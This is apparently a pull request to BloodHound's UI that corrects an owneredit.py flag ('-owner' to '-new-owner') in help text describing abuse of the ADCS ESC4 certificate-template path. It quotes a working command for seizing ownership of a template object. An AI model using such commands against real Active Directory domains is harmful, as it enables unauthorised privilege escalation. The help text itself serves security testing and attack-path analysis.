### PR TITLE
Update LinuxAbuse.tsx, correct typo

### DIFF
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/LinuxAbuse.tsx
@@ -38,7 +38,7 @@ const LinuxAbuse: FC = () => {
             </CodeController>
             <Typography variant='body2'>Change the ownership of the object:</Typography>
             <CodeController>
-                {`owneredit.py -action write -owner 'attacker' -target-dn 'template-dn' 'domain'/'attacker':'password'`}
+                {`owneredit.py -action write -new-owner 'attacker' -target-dn 'template-dn' 'domain'/'attacker':'password'`}
             </CodeController>
             <Typography variant='body2'>
                 Confirm that the ownership was changed by running the first command again.


### PR DESCRIPTION
corrected owneredit.py syntax

https://github.com/ThePorgs/impacket/blob/9aa93730ccb355a7ef8e9295c974460610ae798b/examples/owneredit.py#L246-L248

owneredit.py --help
........
owner:
  Object, controlled by the attacker, to set as owner of the target object

  -new-owner NAME       sAMAccountName
  -new-owner-sid SID    Security IDentifier
  -new-owner-dn DN      Distinguished Name

## Description

<!--- Describe your changes in detail -->

## Motivation and Context

typo

## How Has This Been Tested?

yes, inside of a lab

## Screenshots (if appropriate):

## Types of changes

<!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: -->

-   [ ] Chore (a change that does not modify the application functionality)
-   [ ] Bug fix (non-breaking change which fixes an issue)
-   [ ] New feature (non-breaking change which adds functionality)
-   [ ] Breaking change (fix or feature that would cause existing functionality to change)

## Checklist:

<!--- Go over all the following points, and put an `x` in all the boxes that apply. -->
<!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! -->

-   [ ] Documentation updates are needed, and have been made accordingly.
-   [ ] I have added and/or updated tests to cover my changes.
-   [ ] All new and existing tests passed.
-   [ ] My changes include a database migration.
